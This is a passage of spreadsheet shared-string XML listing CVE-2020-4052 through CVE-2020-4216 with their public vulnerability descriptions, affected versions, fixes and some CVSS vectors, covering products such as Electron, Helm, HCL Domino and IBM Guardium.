    <t>In Dijit before versions 1.11.11, and greater than or equal to 1.12.0 and less than 1.12.9, and greater than or equal to 1.13.0 and less than 1.13.8, and greater than or equal to 1.14.0 and less than 1.14.7, and greater than or equal to 1.15.0 and less than 1.15.4, and greater than or equal to 1.16.0 and less than 1.16.3, there is a cross-site scripting vulnerability in the Editor's LinkDialog plugin. This has been fixed in 1.11.11, 1.12.9, 1.13.8, 1.14.7, 1.15.4, 1.16.3.</t>
  </si>
  <si>
    <t>CVE-2020-4052</t>
  </si>
  <si>
    <t>In Wiki.js before 2.4.107, there is a stored cross-site scripting through template injection. This vulnerability exists due to an insecure validation mechanism intended to insert v-pre tags into rendered HTML elements which contain curly-braces. By creating a crafted wiki page, a malicious Wiki.js user may stage a stored cross-site scripting attack. This allows the attacker to execute malicious JavaScript when the page is viewed by other users. This has been patched in 2.4.107.</t>
  </si>
  <si>
    <t>CVE-2020-4053</t>
  </si>
  <si>
    <t>In Helm greater than or equal to 3.0.0 and less than 3.2.4, a path traversal attack is possible when installing Helm plugins from a tar archive over HTTP. It is possible for a malicious plugin author to inject a relative path into a plugin archive, and copy a file outside of the intended directory. This has been fixed in 3.2.4.</t>
  </si>
  <si>
    <t>CVE-2020-4054</t>
  </si>
  <si>
    <t>In Sanitize (RubyGem sanitize) greater than or equal to 3.0.0 and less than 5.2.1, there is a cross-site scripting vulnerability. When HTML is sanitized using Sanitize's "relaxed" config, or a custom config that allows certain elements, some content in a math or svg element may not be sanitized correctly even if math and svg are not in the allowlist. You are likely to be vulnerable to this issue if you use Sanitize's relaxed config or a custom config that allows one or more of the following HTML elements: iframe, math, noembed, noframes, noscript, plaintext, script, style, svg, xmp. Using carefully crafted input, an attacker may be able to sneak arbitrary HTML through Sanitize, potentially resulting in XSS (cross-site scripting) or other undesired behavior when that HTML is rendered in a browser. This has been fixed in 5.2.1.</t>
  </si>
  <si>
    <t>CVE-2020-4059</t>
  </si>
  <si>
    <t>In mversion before 2.0.0, there is a command injection vulnerability. This issue may lead to remote code execution if a client of the library calls the vulnerable method with untrusted input. This vulnerability is patched by version 2.0.0. Previous releases are deprecated in npm. As a workaround, make sure to escape git commit messages when using the commitMessage option for the update function.</t>
  </si>
  <si>
    <t>CVE-2020-4060</t>
  </si>
  <si>
    <t>In LoRa Basics Station before 2.0.4, there is a Use After Free vulnerability that leads to memory corruption. This bug is triggered on 32-bit machines when the CUPS server responds with a message (https://doc.sm.tc/station/cupsproto.html#http-post-response) where the signature length is larger than 2 GByte (never happens in practice), or the response is crafted specifically to trigger this issue (i.e. the length signature field indicates a value larger than (2**31)-1 although the signature actually does not contain that much data). In such a scenario, on 32 bit machines, Basic Station would execute a code path, where a piece of memory is accessed after it has been freed, causing the process to crash and restarted again. The CUPS transaction is typically mutually authenticated over TLS. Therefore, in order to trigger this vulnerability, the attacker would have to gain access to the CUPS server first. If the user chose to operate without authentication over TLS but yet is concerned about this vulnerability, one possible workaround is to enable TLS authentication. This has been fixed in 2.0.4.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:L</t>
  </si>
  <si>
    <t>CVE-2020-4061</t>
  </si>
  <si>
    <t>In October from version 1.0.319 and before version 1.0.467, pasting content copied from malicious websites into the Froala richeditor could result in a successful self-XSS attack. This has been fixed in 1.0.467.</t>
  </si>
  <si>
    <t>CVE-2020-4062</t>
  </si>
  <si>
    <t>In Conjur OSS Helm Chart before 2.0.0, a recently identified critical vulnerability resulted in the installation of the Conjur Postgres database with an open port. This allows an attacker to gain full read &amp; write access to the Conjur Postgres database, including escalating the attacker's privileges to assume full control. A malicious actor who knows the IP address and port number of the Postgres database and has access into the Kubernetes cluster where Conjur runs can gain full read &amp; write access to the Postgres database. This enables the attacker to write a policy that allows full access to retrieve any secret. This Helm chart is a method to install Conjur OSS into a Kubernetes environment. Hence, the systems impacted are only Conjur OSS systems that were deployed using this chart. Other deployments including Docker and the CyberArk Dynamic Access Provider (DAP) are not affected. To remediate this vulnerability, clone the latest Helm Chart and follow the upgrade instructions. If you are not able to fully remediate this vulnerability immediately, you can mitigate some of the risk by making sure Conjur OSS is deployed on an isolated Kubernetes cluster or namespace. The term "isolated" refers to: - No other workloads besides Conjur OSS and its backend database are running in that Kubernetes cluster/namespace. - Kubernetes and helm access to the cluster/namespace is limited to security administrators via Role-Based Access Control (RBAC).</t>
  </si>
  <si>
    <t>CVE-2020-4066</t>
  </si>
  <si>
    <t>In Limdu before 0.95, the trainBatch function has a command injection vulnerability. Clients of the Limdu library are unlikely to be aware of this, so they might unwittingly write code that contains a vulnerability. This has been patched in 0.95.</t>
  </si>
  <si>
    <t>CVE-2020-4067</t>
  </si>
  <si>
    <t>In coturn before version 4.5.1.3, there is an issue whereby STUN/TURN response buffer is not initialized properly. There is a leak of information between different client connections. One client (an attacker) could use their connection to intelligently query coturn to get interesting bytes in the padding bytes from the connection of another client. This has been fixed in 4.5.1.3.</t>
  </si>
  <si>
    <t>CVE-2020-4068</t>
  </si>
  <si>
    <t>In APNSwift 1.0.0, calling APNSwiftSigner.sign(digest:) is likely to result in a heap buffer overflow. This has been fixed in 1.0.1.</t>
  </si>
  <si>
    <t>CVE-2020-4070</t>
  </si>
  <si>
    <t>In CSS Validator less than or equal to commit 54d68a1, there is a cross-site scripting vulnerability in handling URIs. A user would have to click on a specifically crafted validator link to trigger it. This has been patched in commit e5c09a9.</t>
  </si>
  <si>
    <t>CVE-2020-4071</t>
  </si>
  <si>
    <t>In django-basic-auth-ip-whitelist before 0.3.4, a potential timing attack exists on websites where the basic authentication is used or configured, i.e. BASIC_AUTH_LOGIN and BASIC_AUTH_PASSWORD is set. Currently the string comparison between configured credentials and the ones provided by users is performed through a character-by-character string comparison. This enables a possibility that attacker may time the time it takes the server to validate different usernames and password, and use this knowledge to work out the valid credentials. This attack is understood not to be realistic over the Internet. However, it may be achieved from within local networks where the website is hosted, e.g. from inside a data centre where a website's server is located. Sites protected by IP address whitelisting only are unaffected by this vulnerability. This vulnerability has been fixed on version 0.3.4 of django-basic-auth-ip-whitelist. Update to version 0.3.4 as soon as possible and change basic authentication username and password configured on a Django project using this package. A workaround without upgrading to version 0.3.4 is to stop using basic authentication and use the IP whitelisting component only. It can be achieved by not setting BASIC_AUTH_LOGIN and BASIC_AUTH_PASSWORD in Django project settings.</t>
  </si>
  <si>
    <t>208</t>
  </si>
  <si>
    <t>CVE-2020-4072</t>
  </si>
  <si>
    <t>In generator-jhipster-kotlin version 1.6.0 log entries are created for invalid password reset attempts. As the email is provided by a user and the api is public this can be used by an attacker to forge log entries. This is vulnerable to https://cwe.mitre.org/data/definitions/117.html This problem affects only application generated with jwt or session authentication. Applications using oauth are not vulnerable. This issue has been fixed in version 1.7.0.</t>
  </si>
  <si>
    <t>117</t>
  </si>
  <si>
    <t>CVE-2020-4074</t>
  </si>
  <si>
    <t>In PrestaShop from version 1.5.0.0 and before version 1.7.6.6, the authentication system is malformed and an attacker is able to forge requests and execute admin commands. The problem is fixed in 1.7.6.6.</t>
  </si>
  <si>
    <t>CVE-2020-4075</t>
  </si>
  <si>
    <t>In Electron before versions 7.2.4, 8.2.4, and 9.0.0-beta21, arbitrary local file read is possible by defining unsafe window options on a child window opened via window.open. As a workaround, ensure you are calling `event.preventDefault()` on all new-window events where the `url` or `options` is not something you expect. This is fixed in versions 9.0.0-beta.21, 8.2.4 and 7.2.4.</t>
  </si>
  <si>
    <t>CVE-2020-4076</t>
  </si>
  <si>
    <t>In Electron before versions 7.2.4, 8.2.4, and 9.0.0-beta21, there is a context isolation bypass. Code running in the main world context in the renderer can reach into the isolated Electron context and perform privileged actions. Apps using contextIsolation are affected. This is fixed in versions 9.0.0-beta.21, 8.2.4 and 7.2.4.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N</t>
  </si>
  <si>
    <t>CVE-2020-4077</t>
  </si>
  <si>
    <t>In Electron before versions 7.2.4, 8.2.4, and 9.0.0-beta21, there is a context isolation bypass. Code running in the main world context in the renderer can reach into the isolated Electron context and perform privileged actions. Apps using both `contextIsolation` and `contextBridge` are affected. This is fixed in versions 9.0.0-beta.21, 8.2.4 and 7.2.4.</t>
  </si>
  <si>
    <t>CVE-2020-4079</t>
  </si>
  <si>
    <t>Combodo iTop is a web based IT Service Management tool. In iTop before versions 2.7.2 and 2.8.0, when the ajax endpoint for the "excel export" portal functionality is called directly it allows getting data without scope filtering. This allows a user to access data they which they should not have access to. This is fixed in versions 2.7.2 and 3.0.0.</t>
  </si>
  <si>
    <t>CVE-2020-4080</t>
  </si>
  <si>
    <t>HCL Verse v10 and v11 is susceptible to a Stored Cross-Site Scripting (XSS) vulnerability due to improper handling of message content. An unauthenticated remote attacker could exploit this vulnerability using specially-crafted markup to execute script in a victim's web browser within the security context of the hosting Web site and/or steal the victim's cookie-based authentication credentials.</t>
  </si>
  <si>
    <t>CVE-2020-4081</t>
  </si>
  <si>
    <t>In Digital Experience 8.5, 9.0, and 9.5, WSRP consumer is vulnerable to cross-site scripting (XSS).</t>
  </si>
  <si>
    <t>CVE-2020-4082</t>
  </si>
  <si>
    <t>The HCL Connections 5.5 help system is vulnerable to cross-site scripting, caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.</t>
  </si>
  <si>
    <t>CVE-2020-4083</t>
  </si>
  <si>
    <t>HCL Connections 6.5 is vulnerable to possible information leakage. Connections could disclose sensitive information via trace logs to a local user.</t>
  </si>
  <si>
    <t>CVE-2020-4084</t>
  </si>
  <si>
    <t>HCL Connections v5.5, v6.0, and v6.5 are vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.</t>
  </si>
  <si>
    <t>CVE-2020-4085</t>
  </si>
  <si>
    <t>"HCL Connections is vulnerable to possible information leakage and could disclose sensitive information via stack trace to a local user."</t>
  </si>
  <si>
    <t>CVE-2020-4089</t>
  </si>
  <si>
    <t>HCL Notes is vulnerable to an information leakage vulnerability through its support for the 'mailto' protocol. This vulnerability could result in files from the user's filesystem or connected network filesystems being leaked to a third party. All versions of HCL Notes 9, 10 and 11 are affected.</t>
  </si>
  <si>
    <t>CVE-2020-4092</t>
  </si>
  <si>
    <t>"If port encryption is not enabled on the Domino Server, HCL Nomad on Android and iOS Platforms will communicate in clear text and does not currently have a user interface option to change the setting to request an encrypted communication channel with the Domino server. This can potentially expose sensitive information including but not limited to server names, user IDs and document content."</t>
  </si>
  <si>
    <t>CVE-2020-4095</t>
  </si>
  <si>
    <t>"BigFix Platform is storing clear text credentials within the system's memory. An attacker who is able to gain administrative privileges can use a program to create a memory dump and extract the credentials. These credentials can be used to pivot further into the environment. The principle of least privilege should be applied to all BigFix deployments, limiting administrative access."</t>
  </si>
  <si>
    <t>CVE-2020-4097</t>
  </si>
  <si>
    <t>In HCL Notes version 9 previous to release 9.0.1 FixPack 10 Interim Fix 8, version 10 previous to release 10.0.1 FixPack 6 and version 11 previous to 11.0.1 FixPack 1, a vulnerability in the input parameter handling of the Notes Client could potentially be exploited by an attacker resulting in a buffer overflow. This could enable an attacker to crash HCL Notes or execute attacker-controlled code on the client.</t>
  </si>
  <si>
    <t>CVE-2020-4099</t>
  </si>
  <si>
    <t>The application was signed using a key length less than or equal to 1024 bits, making it potentially vulnerable to forged digital signatures. An attacker could forge the same digital signature of the app after maliciously modifying the app.</t>
  </si>
  <si>
    <t>CVE-2020-4100</t>
  </si>
  <si>
    <t>"HCL Verse for Android was found to employ dynamic code loading. This mechanism allows a developer to specify which components of the application should not be loaded by default when the application is started. Typically, core components and additional dependencies are loaded natively at runtime; however, dynamically loaded components are only loaded as they are specifically requested. While this can have a positive impact on performance, or grant additional functionality (for example, a non-invasive update feature), it can also open the application to loading unintended code if not implemented properly."</t>
  </si>
  <si>
    <t>CVE-2020-4101</t>
  </si>
  <si>
    <t>"HCL Digital Experience is susceptible to Server Side Request Forgery."</t>
  </si>
  <si>
    <t>CVE-2020-4102</t>
  </si>
  <si>
    <t>HCL Notes is susceptible to a Buffer Overflow vulnerability in DXL due to improper validation of user input. A successful exploit could enable an attacker to crash Notes or execute attacker-controlled code on the client system.</t>
  </si>
  <si>
    <t>CVE-2020-4104</t>
  </si>
  <si>
    <t>HCL BigFix WebUI is vulnerable to stored cross-site scripting (XSS) within the Apps-&gt;Software module. An attacker can use XSS to send a malicious script to an unsuspecting user. This affects all versions prior to latest releases as specified in https://support.hcltechsw.com/csm?id=kb_article&amp;sysparm_article=KB0080855&amp;sys_kb_id=971d99ed1b8ed01c086dcbfc0a4bcb6a.</t>
  </si>
  <si>
    <t>CVE-2020-4107</t>
  </si>
  <si>
    <t>HCL Domino is affected by an Insufficient Access Control vulnerability. An authenticated attacker with local access to the system could exploit this vulnerability to attain escalation of privileges, denial of service, or information disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-4125</t>
  </si>
  <si>
    <t>Using HCL Marketing Operations 9.1.2.4, 10.1.x, 11.1.0.x, a malicious attacker could download files from the RHEL environment by doing some modification in the link, giving the attacker access to confidential information.</t>
  </si>
  <si>
    <t>CVE-2020-4126</t>
  </si>
  <si>
    <t>HCL iNotes is susceptible to a sensitive cookie exposure vulnerability. This can allow an unauthenticated remote attacker to capture the cookie by intercepting its transmission within an http session. Fixes are available in HCL Domino and iNotes versions 10.0.1 FP6 and 11.0.1 FP2 and later.</t>
  </si>
  <si>
    <t>CVE-2020-4127</t>
  </si>
  <si>
    <t>HCL Domino is susceptible to a Login CSRF vulnerability. With a valid credential, an attacker could trick a user into accessing a system under another ID or use an intranet user's system to access internal systems from the internet. Fixes are available in HCL Domino versions 9.0.1 FP10 IF6, 10.0.1 FP6 and 11.0.1 FP1 and later.</t>
  </si>
  <si>
    <t>CVE-2020-4128</t>
  </si>
  <si>
    <t>HCL Domino is susceptible to a lockout policy bypass vulnerability in the ID Vault service. An unauthenticated attacker could use this vulnerability to mount a brute force attack against the ID Vault service.</t>
  </si>
  <si>
    <t>CVE-2020-4129</t>
  </si>
  <si>
    <t>HCL Domino is susceptible to a lockout policy bypass vulnerability in the LDAP service. An unauthenticated attacker could use this vulnerability to mount a brute force attack against the LDAP service. Fixes are available in HCL Domino versions 9.0.1 FP10 IF6, 10.0.1 FP6 and 11.0.1 FP1 and later.</t>
  </si>
  <si>
    <t>CVE-2020-4135</t>
  </si>
  <si>
    <t>IBM DB2 for Linux, UNIX and Windows (includes DB2 Connect Server) 9.7, 10.1, 10.5, 11.1, and 11.5 could allow an unauthenticated user to send specially crafted packets to cause a denial of service from excessive memory usage.</t>
  </si>
  <si>
    <t>CVE-2020-4138</t>
  </si>
  <si>
    <t>IBM SiteProtector Appliance 3.1.1 allows web pages to be stored locally which can be read by another user on the system. IBM X-Force ID: 174049.</t>
  </si>
  <si>
    <t>CVE-2020-4140</t>
  </si>
  <si>
    <t>IBM Security SiteProtector System 3.1.1 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 174052.</t>
  </si>
  <si>
    <t>CVE-2020-4146</t>
  </si>
  <si>
    <t>IBM Security SiteProtector System 3.1.1 could allow a remote attacker to obtain sensitive information, caused by missing 'HttpOnly' flag. A remote attacker could exploit this vulnerability to obtain sensitive information. IBM X-Force ID: 174129.</t>
  </si>
  <si>
    <t>CVE-2020-4150</t>
  </si>
  <si>
    <t>IBM SiteProtector Appliance 3.1.1 contains hard-coded credentials, such as a password or cryptographic key, which it uses for its own inbound authentication, outbound communication to external components, or encryption of internal data. IBM X-Force ID: 174142.</t>
  </si>
  <si>
    <t>CVE-2020-4151</t>
  </si>
  <si>
    <t>IBM QRadar SIEM 7.3.0 through 7.3.3 could allow an authenticated attacker to perform unauthorized actions due to improper input validation. IBM X-Force ID: 174201.</t>
  </si>
  <si>
    <t>CVE-2020-4152</t>
  </si>
  <si>
    <t>IBM QRadar Network Security 5.4.0 and 5.5.0 transmits sensitive or security-critical data in cleartext in a communication channel that can be obtained using man in the middle techniques. IBM X-Force ID: 17467.</t>
  </si>
  <si>
    <t>CVE-2020-4153</t>
  </si>
  <si>
    <t>IBM QRadar Network Security 5.4.0 and 5.5.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 174269.</t>
  </si>
  <si>
    <t>CVE-2020-4157</t>
  </si>
  <si>
    <t>IBM QRadar Network Security 5.4.0 and 5.5.0 contains hard-coded credentials, such as a password or cryptographic key, which it uses for its own inbound authentication, outbound communication to external components, or encryption of internal data. IBM X-Force ID: 174337.</t>
  </si>
  <si>
    <t>CVE-2020-4159</t>
  </si>
  <si>
    <t>IBM QRadar Network Security 5.4.0 and 5.5.0 discloses sensitive information to unauthorized users which could be used to mount further attacks against the system. IBM X-Force ID: 174339.</t>
  </si>
  <si>
    <t>CVE-2020-4160</t>
  </si>
  <si>
    <t>IBM QRadar Network Security 5.4.0 and 5.5.0 could allow a remote attacker to obtain sensitive information, caused by the failure to properly enable HTTP Strict Transport Security. An attacker could exploit this vulnerability to obtain sensitive information using man in the middle techniques. IBM X-Force ID: 174340.</t>
  </si>
  <si>
    <t>CVE-2020-4161</t>
  </si>
  <si>
    <t>IBM DB2 for Linux, UNIX and Windows (includes DB2 Connect Server) 11.5 could allow an authenticated attacker to cause a denial of service due to incorrect handling of certain commands. IBM X-Force ID: 174341.</t>
  </si>
  <si>
    <t>CVE-2020-4162</t>
  </si>
  <si>
    <t>IBM InfoSphere Information Server 11.5 and 11.7 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 174342.</t>
  </si>
  <si>
    <t>CVE-2020-4163</t>
  </si>
  <si>
    <t>IBM WebSphere Application Server 7.0, 8.0, 8.5, and 9.0, under specialized conditions, could allow an authenticated user to create a maliciously crafted file name which would be misinterpreted as jsp content and executed. IBM X-Force ID: 174397.</t>
  </si>
  <si>
    <t>CVE-2020-4164</t>
  </si>
  <si>
    <t>IBM Security Information Queue (ISIQ) 1.0.0, 1.0.1, 1.0.2, 1.0.3, 1.0.4, and 1.0.5 could expose sensitive information from applicatino errors which could be used in further attacks against the system. IBM X-Force ID: 174400.</t>
  </si>
  <si>
    <t>CVE-2020-4165</t>
  </si>
  <si>
    <t>IBM Security Guardium Insights 2.0.1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74401.</t>
  </si>
  <si>
    <t>CVE-2020-4166</t>
  </si>
  <si>
    <t>IBM Security Guardium Insights 2.0.1 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 174402.</t>
  </si>
  <si>
    <t>CVE-2020-4167</t>
  </si>
  <si>
    <t>IBM Security Guardium Insights 2.0.1 could allow an attacker to obtain sensitive information or perform unauthorized actions due to improper authenciation mechanisms. IBM X-Force ID: 174403.</t>
  </si>
  <si>
    <t>CVE-2020-4169</t>
  </si>
  <si>
    <t>IBM Security Guardium Insights 2.0.1 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 174405.</t>
  </si>
  <si>
    <t>CVE-2020-4170</t>
  </si>
  <si>
    <t>IBM Security Guardium Insights 2.0.1 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 174406.</t>
  </si>
  <si>
    <t>CVE-2020-4171</t>
  </si>
  <si>
    <t>IBM Security Guardium Insights 2.0.1 allows web pages to be stored locally which can be read by another user on the system. IBM X-Force ID: 174407.</t>
  </si>
  <si>
    <t>CVE-2020-4172</t>
  </si>
  <si>
    <t>IBM Security Guardium Insights 2.0.1 stores sensitive information in URL parameters. This may lead to information disclosure if unauthorized parties have access to the URLs via server logs, referrer header or browser history. IBM X-Force ID: 174408.</t>
  </si>
  <si>
    <t>CVE-2020-4173</t>
  </si>
  <si>
    <t>IBM Guardium Activity Insights 10.6 and 11.0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74682.</t>
  </si>
  <si>
    <t>CVE-2020-4174</t>
  </si>
  <si>
    <t>IBM Security Guardium Insights 2.0.1 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 174683.</t>
  </si>
  <si>
    <t>CVE-2020-4175</t>
  </si>
  <si>
    <t>IBM Security Guardium Insights 2.0.1 could allow a remote attacker to obtain sensitive information, caused by the failure to properly enable HTTP Strict Transport Security. An attacker could exploit this vulnerability to obtain sensitive information using man in the middle techniques. IBM X-Force ID: 174684.</t>
  </si>
  <si>
    <t>CVE-2020-4177</t>
  </si>
  <si>
    <t>IBM Security Guardium 11.1 contains hard-coded credentials, such as a password or cryptographic key, which it uses for its own inbound authentication, outbound communication to external components, or encryption of internal data. IBM X-Force ID: 174732.</t>
  </si>
  <si>
    <t>CVE-2020-4180</t>
  </si>
  <si>
    <t>IBM Security Guardium 11.1 could allow a remote authenticated attacker to execute arbitrary commands on the system. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary commands on the system. IBM X-Force ID: 174735.</t>
  </si>
  <si>
    <t>CVE-2020-4182</t>
  </si>
  <si>
    <t>IBM Security Guardium 11.1 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 174738.</t>
  </si>
  <si>
    <t>CVE-2020-4183</t>
  </si>
  <si>
    <t>IBM Security Guardium 11.1 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 174739.</t>
  </si>
  <si>
    <t>CVE-2020-4184</t>
  </si>
  <si>
    <t>IBM Security Guardium 11.2 performs an operation at a privilege level that is higher than the minimum level required, which creates new weaknesses or amplifies the consequences of other weaknesses. IBM X-Force ID: 174802..</t>
  </si>
  <si>
    <t>CVE-2020-4185</t>
  </si>
  <si>
    <t>IBM Security Guardium 10.5, 10.6, and 11.1 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 174803.</t>
  </si>
  <si>
    <t>CVE-2020-4186</t>
  </si>
  <si>
    <t>IBM Security Guardium 10.5, 10.6, and 11.1 could disclose sensitive information on the login page that could aid in further attacks against the system. IBM X-Force ID: 174804.</t>
  </si>
  <si>
    <t>CVE-2020-4187</t>
  </si>
  <si>
    <t>IBM Security Guardium 11.1 could disclose sensitive information on the login page that could aid in further attacks against the system. IBM X-Force ID: 174805.</t>
  </si>
  <si>
    <t>CVE-2020-4188</t>
  </si>
  <si>
    <t>IBM Security Guardium 10.6 and 11.1 may use insufficiently random numbers or values in a security context that depends on unpredictable numbers. IBM X-Force ID: 174807.</t>
  </si>
  <si>
    <t>CVE-2020-4189</t>
  </si>
  <si>
    <t>IBM Security Guardium 11.2 discloses sensitive information in the response headers that could be used in further attacks against the system. IBM X-Force ID: 174850.</t>
  </si>
  <si>
    <t>CVE-2020-4190</t>
  </si>
  <si>
    <t>IBM Security Guardium 10.6, 11.0, and 11.1 contains hard-coded credentials, such as a password or cryptographic key, which it uses for its own inbound authentication, outbound communication to external components, or encryption of internal data. IBM X-Force ID: 174851.</t>
  </si>
  <si>
    <t>CVE-2020-4191</t>
  </si>
  <si>
    <t>IBM Security Guardium 11.1 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 174852.</t>
  </si>
  <si>
    <t>CVE-2020-4193</t>
  </si>
  <si>
    <t>IBM Security Guardium 11.1 uses an inadequate account lockout setting that could allow a remote attacker to brute force account credentials. IBM X-Force ID: 174857.</t>
  </si>
  <si>
    <t>CVE-2020-4195</t>
  </si>
  <si>
    <t>IBM API Connect V2018.4.1.0 through 2018.4.1.10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74859.</t>
  </si>
  <si>
    <t>CVE-2020-4196</t>
  </si>
  <si>
    <t>IBM Tivoli Netcool/OMNIbus_GUI 8.1.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 174907.</t>
  </si>
  <si>
    <t>CVE-2020-4197</t>
  </si>
  <si>
    <t>IBM Tivoli Netcool/OMNIbus_GUI 8.1.0 allows web pages to be stored locally which can be read by another user on the system. IBM X-Force ID: 174908.</t>
  </si>
  <si>
    <t>CVE-2020-4198</t>
  </si>
  <si>
    <t>IBM Tivoli Netcool/OMNIbus_GUI 8.1.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 174909.</t>
  </si>
  <si>
    <t>CVE-2020-4199</t>
  </si>
  <si>
    <t>IBM Tivoli Netcool/OMNIbus 8.1.0 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 174910.</t>
  </si>
  <si>
    <t>CVE-2020-4200</t>
  </si>
  <si>
    <t>IBM DB2 for Linux, UNIX and Windows (includes DB2 Connect Server) 10.5, 11.1, and 11.5 could allow an authenticated attacker to send specially crafted commands to cause a denial of service. IBM X-Force ID: 174914.</t>
  </si>
  <si>
    <t>CVE-2020-4202</t>
  </si>
  <si>
    <t>IBM UrbanCode Deploy (UCD) 7.0.3.0 and 7.0.4.0 could allow an authenticated user to impersonate another user if the server is configured to enable Distributed Front End (DFE). IBM X-Force ID: 174955.</t>
  </si>
  <si>
    <t>CVE-2020-4203</t>
  </si>
  <si>
    <t>IBM DataPower Gateway 2018.4.1.0 through 2018.4.1.8 could potentially disclose highly sensitive information to a privileged user due to improper access controls. IBM X-Force ID: 174956.</t>
  </si>
  <si>
    <t>CVE-2020-4204</t>
  </si>
  <si>
    <t>IBM DB2 for Linux, UNIX and Windows (includes DB2 Connect Server) 9.7, 10.1, 10.5, 11.1, and 11.5 is vulnerable to a buffer overflow, caused by improper bounds checking which could allow a local attacker to execute arbitrary code on the system with root privileges. IBM X-Force ID: 174960.</t>
  </si>
  <si>
    <t>CVE-2020-4205</t>
  </si>
  <si>
    <t>IBM DataPower Gateway 2018.4.1.0 through 2018.4.1.8 could allow an authenticated user to bypass security restrictions, and continue to access the server even after authentication certificates have been revolked. IBM X-Force ID: 174961.</t>
  </si>
  <si>
    <t>CVE-2020-4206</t>
  </si>
  <si>
    <t>IBM Spectrum Protect Plus 10.1.0 through 10.1.5 could allow a remote attacker to execute arbitrary commands on the system in the context of root user, caused by improper validation of user-supplied input. IBM X-Force ID: 174966.</t>
  </si>
  <si>
    <t>CVE-2020-4207</t>
  </si>
  <si>
    <t>IBM Watson IoT Message Gateway 2.0.0.x, 5.0.0.0, 5.0.0.1, and 5.0.0.2 is vulnerable to a buffer overflow, caused by improper bounds checking when handling a failed HTTP request with specific content in the headers. By sending a specially crafted HTTP request, a remote attacker could overflow a buffer and execute arbitrary code on the system or cause a denial of service. IBM X-Force ID: 174972.</t>
  </si>
  <si>
    <t>CVE-2020-4208</t>
  </si>
  <si>
    <t>IBM Spectrum Protect Plus 10.1.0 through 10.1.5 contains hard-coded credentials, such as a password or cryptographic key, which it uses for its own inbound authentication, outbound communication to external components, or encryption of internal data. IBM X-Force ID: 174975.</t>
  </si>
  <si>
    <t>CVE-2020-4209</t>
  </si>
  <si>
    <t>IBM Spectrum Protect Plus 10.1.0 through 10.1.5 could allow a remote attacker to traverse directories on the system. An attacker could send a specially-crafted URL request containing "dot dot" sequences (/../) to create arbitrary files on the system. IBM X-Force ID: 175019.</t>
  </si>
  <si>
    <t>CVE-2020-4210</t>
  </si>
  <si>
    <t>IBM Spectrum Protect Plus 10.1.0 and 10.1.5 could allow a remote attacker to execute arbitrary code on the system. By using a specially crafted HTTP command, an attacker could exploit this vulnerability to execute arbitrary command on the system. IBM X-Force ID: 175020.</t>
  </si>
  <si>
    <t>CVE-2020-4211</t>
  </si>
  <si>
    <t>IBM Spectrum Protect Plus 10.1.0 and 10.1.5 could allow a remote attacker to execute arbitrary code on the system. By using a specially crafted HTTP command, an attacker could exploit this vulnerability to execute arbitrary command on the system. IBM X-Force ID: 175022.</t>
  </si>
  <si>
    <t>CVE-2020-4212</t>
  </si>
  <si>
    <t>IBM Spectrum Protect Plus 10.1.0 and 10.1.5 could allow a remote attacker to execute arbitrary code on the system. By using a specially crafted HTTP command, an attacker could exploit this vulnerability to execute arbitrary command on the system. IBM X-Force ID: 175023.</t>
  </si>
  <si>
    <t>CVE-2020-4213</t>
  </si>
  <si>
    <t>IBM Spectrum Protect Plus 10.1.0 and 10.1.5 could allow a remote attacker to execute arbitrary code on the system. By using a specially crafted HTTP command, an attacker could exploit this vulnerability to execute arbitrary command on the system. IBM X-Force ID: 175024.</t>
  </si>
  <si>
    <t>CVE-2020-4214</t>
  </si>
  <si>
    <t>IBM Spectrum Protect Plus 10.1.0 through 10.1.5 could allow a remote attacker to arbitrary delete a directory caused by improper validation of user-supplied input. IBM X-Force ID: 175026.</t>
  </si>
  <si>
    <t>CVE-2020-4216</t>
  </si>
  <si>
    <t>IBM Spectrum Protect Plus 10.1.0 through 10.1.5 contains hard-coded credentials, such as a password or cryptographic key, which it uses for its own inbound authentication, outbound communication to external components, or encryption of internal data. IBM X-Force ID: 175066.</t>
  </si>
  <si>
    <t>CVE-2020-4217</t>
  </si>
  <si>
